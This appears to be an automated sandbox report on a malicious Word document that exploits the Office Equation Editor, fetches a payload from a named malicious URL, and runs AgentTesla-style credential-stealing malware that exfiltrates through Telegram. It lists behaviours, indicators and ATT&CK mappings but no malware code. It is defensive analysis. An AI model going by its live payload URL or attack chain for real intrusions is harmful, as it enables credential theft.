                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364Thread sleep time: -150000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096Thread sleep count: 9569 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096Thread sleep count: 171 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364Thread sleep count: 105 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWindow / User API: threadDelayed 9569Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeThread delayed: delay time: 30000Jump to behavior

                      Anti Debugging:

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041DCAE8 CheckRemoteDebuggerPresent,4_2_041DCAE8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory written: C:\Users\user\AppData\Roaming\gudostrp.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exeJump to behavior
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: !Progman
                      Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeQueries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeQueries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation211Valid Accounts1Valid Accounts1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Obfuscated Files or Information11Security Account ManagerSecurity Software Discovery22SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol24Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion141Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 502700 Sample: Purchase Order_0131021.doc Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 29 Found malware configuration 2->29 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 11 other signatures 2->35 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 25 2->12         started        process3 dnsIp4 27 palangavra.lt 144.76.47.167, 49167, 80 HETZNER-ASDE Germany 7->27 21 C:\Users\user\AppData\Roaming\gudostrp.exe, PE32 7->21 dropped 23 C:\Users\user\AppData\...\gufoxqa[1].exe, PE32 7->23 dropped 45 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->45 14 gudostrp.exe 2 7->14         started        file5 signatures6 process7 signatures8 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->47 49 Machine Learning detection for dropped file 14->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->51 53 2 other signatures 14->53 17 gudostrp.exe 12 2 14->17         started        process9 dnsIp10 25 api.telegram.org 149.154.167.220, 443, 49169 TELEGRAMRU United Kingdom 17->25 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->37 39 Tries to steal Mail credentials (via file access) 17->39 41 Tries to harvest and steal ftp login credentials 17->41 43 Tries to harvest and steal browser information (history, passwords, etc) 17->43 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Purchase Order_0131021.doc37%VirustotalBrowse
                      Purchase Order_0131021.doc36%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\gudostrp.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.gudostrp.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://SwonTwAJYn3XCAV3.net0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://api.telegram.orgP0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://palangavra.lt/jukiestay/gufoxqa.exe100%Avira URL Cloudmalware
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://yBlQIu.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        palangavra.lt
                        		144.76.47.167
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://palangavra.lt/jukiestay/gufoxqa.exetrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://SwonTwAJYn3XCAV3.netgudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://DynDns.comDynDNSgudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpfalse
                            		high
                            https://api.telegram.orggudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpfalse
                              		high
                              http://crl.entrust.net/server1.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                		high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hagudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ocsp.entrust.net03gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.orgPgudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.%s.comPAgudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.diginotar.nl/cps/pkioverheid0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://api.telegram.orggudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmpfalse
                                  		high
                                  http://ocsp.entrust.net0Dgudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpfalse
                                    		high
                                    https://secure.comodo.com/CPS0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipgudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://yBlQIu.comgudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.entrust.net/2048ca.crl0gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpfalse
                                        		high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUfalse
                                        144.76.47.167
                                        		palangavra.ltGermany
                                        		24940HETZNER-ASDEtrue

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:502700
                                        Start date:14.10.2021
                                        Start time:10:22:11
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 18s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:Purchase Order_0131021.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
                                        EGA Information:Failed
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 56
                                        • Number of non-executed functions: 1
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:22:15API Interceptor392x Sleep call for process: EQNEDT32.EXE modified
                                        10:22:17API Interceptor1408x Sleep call for process: gudostrp.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        149.154.167.220SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                          ek3dgxlAe0.exeGet hashmaliciousBrowse
                                            invoice.exeGet hashmaliciousBrowse
                                              Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                  Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                    21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                      SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                        R0987653400008789.exeGet hashmaliciousBrowse
                                                          T98765434567898.exeGet hashmaliciousBrowse
                                                            LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                              photos jpg.exeGet hashmaliciousBrowse
                                                                mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                  vbyltST1At.exeGet hashmaliciousBrowse
                                                                    PO B 12.exeGet hashmaliciousBrowse
                                                                      DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                        1st file name DHL - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                          DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exeGet hashmaliciousBrowse
                                                                            PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                              Message bounce.exeGet hashmaliciousBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                api.telegram.orgSecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                presupuesto.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                R0987653400008789.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                T98765434567898.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                photos jpg.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                vbyltST1At.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PO B 12.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                1st file name DHL - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                TELEGRAMRU6GKjXSaJ8E.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                JetCe3om9L.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                frj4kNTbl3.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                F6RhtCVeTD.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                R0987653400008789.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                T98765434567898.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                photos jpg.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ET13QJzgLL.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                install.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                vbyltST1At.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                HETZNER-ASDEAj#U00e1nlatk#U00e9r#U00e9s 2021.xlsmGet hashmaliciousBrowse
                                                                                • 136.243.159.53
                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                • 116.202.174.203
                                                                                GR01DtRd0N.exeGet hashmaliciousBrowse
                                                                                • 88.99.75.82
                                                                                Payment_Swift,png.exeGet hashmaliciousBrowse
                                                                                • 78.46.56.160
                                                                                PO 211011-021A.exeGet hashmaliciousBrowse
                                                                                • 136.243.159.53
                                                                                S27f5MP8UeGet hashmaliciousBrowse
                                                                                • 5.75.211.8
                                                                                75lT7DuXrs.exeGet hashmaliciousBrowse
                                                                                • 168.119.93.163
                                                                                #Ud83d#Udcde-youse.guia-644-46204-282109.htmGet hashmaliciousBrowse
                                                                                • 95.217.53.76
                                                                                6Vk012xoynGet hashmaliciousBrowse
                                                                                • 144.79.90.35
                                                                                tmDSSwkOAMGet hashmaliciousBrowse
                                                                                • 94.130.40.209
                                                                                8r3HRghvXXGet hashmaliciousBrowse
                                                                                • 95.217.66.142
                                                                                ARK Survival legit hack by Spyro.exeGet hashmaliciousBrowse
                                                                                • 135.181.170.169
                                                                                M12s7KNFDg.exeGet hashmaliciousBrowse
                                                                                • 138.201.79.103
                                                                                NBA 2K21 Cheat by Spyro.exeGet hashmaliciousBrowse
                                                                                • 135.181.170.169
                                                                                Gsdqz.dllGet hashmaliciousBrowse
                                                                                • 116.203.98.109
                                                                                4tOOUNDwaW.exeGet hashmaliciousBrowse
                                                                                • 188.34.163.98
                                                                                7ofFMoirr5.exeGet hashmaliciousBrowse
                                                                                • 188.34.163.98
                                                                                HUTWMrDhov.dllGet hashmaliciousBrowse
                                                                                • 116.203.98.109
                                                                                SecuriteInfo.com.W32.AIDetect.malware1.10225.exeGet hashmaliciousBrowse
                                                                                • 188.34.163.98
                                                                                0q3K4qJqQT.exeGet hashmaliciousBrowse
                                                                                • 88.99.75.82

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                36f7277af969a6947a61ae0b815907a1Order EQE0905.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Order EQE090.xlsxGet hashmaliciousBrowse
                                                                                • 149.154.167.220
